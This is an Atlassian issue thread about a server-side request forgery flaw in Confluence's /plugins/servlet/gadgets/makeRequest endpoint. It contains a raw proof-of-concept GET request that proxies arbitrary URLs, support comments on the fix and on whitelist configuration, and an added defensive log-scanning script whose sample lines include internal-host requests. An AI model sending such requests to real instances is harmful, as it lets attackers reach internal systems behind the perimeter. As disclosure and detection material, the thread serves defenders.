Confluence installations have a permissive whitelist that allows fetching any URL, using Confluence as a proxy.

      Use a GET request to /plugins/servlet/gadgets/makeRequest?url=

      Example, to get the Yandex start page or any resource you want:

      GET /plugins/servlet/gadgets/makeRequest?url=http://ya.ru HTTP/1.1
      Host: xxxxxxxxxxxxxxxxxxxxxx
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Cookie: s_cc=true; s_nr=1521467033623-New; s_vnum=1522558800623%26vn%3D1; s_sq=%5B%5BB%5D%5D
      DNT: 1
      X-Atlassian-Token: no-check
      Connection: close
      Upgrade-Insecure-Requests: 1
      

       

      Update

      This issue was fixed in Confluence version 4.2.14. If you are experiencing this issue in a newer version of Confluence, then please check the configuration of the in-product whitelist as per https://confluence.atlassian.com/doc/configuring-the-whitelist-381255821.html.
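Added example, not part of the original report or Atlassian's code: a log check for defenders that flags calls to the makeRequest endpoint described above when the `url=` target is not on an allowlist. The allowlisted hosts, the combined access-log format and the sample lines are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit, parse_qs

MAKE_REQUEST_PATH = "/plugins/servlet/gadgets/makeRequest"
# Assumption: hosts your gadgets legitimately fetch from (constructed values).
ALLOWED_HOSTS = {"confluence.example.com", "jira.example.com"}
# Matches the request part of a combined-format access log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify_target(url):
    """Return 'allowed', 'internal', 'external' or 'malformed' for a url= value."""
    try:
        host = urlsplit(url).hostname
    except ValueError:
        return "malformed"
    if not host:
        return "malformed"
    host = host.lower()
    if host in ALLOWED_HOSTS:
        return "allowed"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:  # a DNS name rather than an IP literal
        return "internal" if host == "localhost" else "external"
    if ip.is_loopback or ip.is_private or ip.is_link_local:
        return "internal"
    return "external"

def find_proxy_abuse(log_lines):
    """Return (method, url, verdict) for makeRequest calls to non-allowlisted targets."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != MAKE_REQUEST_PATH:
            continue
        for url in parse_qs(parts.query).get("url", []):  # parse_qs URL-decodes
            verdict = classify_target(url)
            if verdict != "allowed":
                hits.append((m.group("method"), url, verdict))
    return hits

# Constructed sample log lines (not taken from the report).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2018:10:00:00 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=http://ya.ru HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2018:10:00:05 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=http%3A%2F%2F10.0.0.5%3A8080%2Fadmin HTTP/1.1" 200 90',
    '198.51.100.2 - - [01/Jan/2018:10:01:00 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=https://jira.example.com/rest/gadget HTTP/1.1" 200 77',
    '198.51.100.2 - - [01/Jan/2018:10:02:00 +0000] "GET /dashboard.action HTTP/1.1" 200 4096',
]
```

Hits with the `internal` verdict deserve the first look, since they show the instance being used to reach hosts behind the perimeter.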

            [CONFSERVER-55981] SSRF via REST API /plugins/servlet/gadgets/makeRequest

            AB added a comment -

            mweber3: Thanks for clarifying that! We'll follow this up on the support ticket.


            Michael Weber added a comment -

            No, and it's not configured (just checked).

            AB added a comment -

            mweber3: Certainly! I think there is some confusion; the outbound proxy is not a solution, but a possible cause of the problem.

            By default, the bug you're describing has been fixed since Confluence v4.2.14 via an outbound requests filter/whitelist (as seen in the linked Ecosystem ticket AG-1502).

            But that filtering may have been disabled on your Jira, which would cause the bug to appear.

            One way the filtering might be disabled is if there were an outbound proxy on your Jira, because your traffic through the proxy would not be beholden to the filter. 

            May I ask if you're aware of any such proxy being on your Jira?


            Michael Weber added a comment - - edited

            Hi, thanks for getting back to me. Would your solution really be that we have to configure an outbound proxy in order to close this vulnerability?

            Some more details would be great. We don't want to customize our Jira configuration/settings that much and want to stay out-of-the-box as much as possible! That makes it easier for upgrades or additional nodes.


            Alex Yakovlev (Inactive) added a comment -

            mweber3, can you please comment in regards to Anton's last question?

            AB added a comment - - edited

            Further investigation reveals that the bug has been seen before (as in the linked Ecosystem ticket AG-1502) but was fixed in Confluence version 4.2.14 via an outbound requests filter/whitelist. However, the filtering can be disabled.

             

            mweber3, may I ask if you've disabled the whitelist on outbound requests - that is, your Confluence instance does not filter outbound requests? For example, have you created an outbound proxy?


            AB added a comment -

            Hi mkhairuliana, I haven't been able to reproduce the bug locally and therefore couldn't find a workaround. The bug may be dependent on a specific gadget installed on the Confluence instance.


            Monique Khairuliana (Inactive) added a comment -

            Hi ablack@atlassian.com, do you know if there's any workaround for this issue?

            AB added a comment - - edited

            mweber3 Ah, thank you for the clarification! I'll update the score.


            Michael Weber added a comment -

            Hi Anton,

            thanks for your response. You DON'T need admin privileges to invoke the SSRF!

            This was reported to us by a hacker from hacker.one - very detailed description. He was able to run several HTTP PUT commands from our external-facing Confluence instance!

            Michael

              zzhou Zhenhuan Zhou (Inactive)
              ef18183341b7 Michael Weber